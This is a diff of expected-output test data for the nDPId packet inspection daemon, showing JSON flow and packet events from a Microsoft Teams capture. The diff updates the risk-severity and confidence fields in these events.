 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2565,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041693869,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShfAqAEGNHL6mMNeAbvdNMkY3FwAm1AQIABWvAAA"}
-00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2567,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041693893,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0NypAAGwG5t80cvqZwKgBBgG7w3QJhgXYjJLL5oAS\/\/9RUwAAAgQFoAEDAwgBAQQC"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2568,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041693893,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShbAqAEGNHL6mcN0AbuMksvmCYYF2VAQIAByEgAA"}
-00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01313{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}}
-01313{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}}
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}}
+01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694219,"flow_last_seen":1587041694219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041694219,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1587041694219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041694219,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9w\/AqAEGNHJNiOyXAbs8mpamAAAAALAC\/\/8lfgAAAgQFtAEDAwUBAQgKMITbvgAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1587041694221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"ts_msec":1587041694221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABWS5cAAP8R7KfAqAEGwKgBAe2lADUAQpDJn88BAAABAAAAAAAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAQ=="}
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1587041694234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"ts_msec":1587041694234,"pkt":"KDc3AG3IEBMx8Tl2CABFAACixyFAADkR9tHAqAEBwKgBBgA17aUAjgAAn8+BgAABAAAAAQAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAcAoAAYAAQAAAA4AQARwcmQxDmF6dXJlZG5zLWNsb3VkwDEGbXNuaHN0CW1pY3Jvc29mdANjb20AfaP8PAAAA4QAAAEsAAk6gAAAADw="}
-00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041694611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMhisAAEARcdvAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZ7QAAEARkFLAqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1587041695305,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1587041695305,"pkt":"KDc3AG3IEBMx8Tl2CABFAACMbOkAADURirVdR27NwKgBBj\/Mw2AAeJv\/AAEAXCESpEJpQfrkOEmJN4IqUAgABgAJRlkzMjpvNS9JAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/3+gDcABAAAAAIACAAUCA60OBRrDjRc1P+cP0BpsLC+QjmAKAAEPxxxZQ=="}
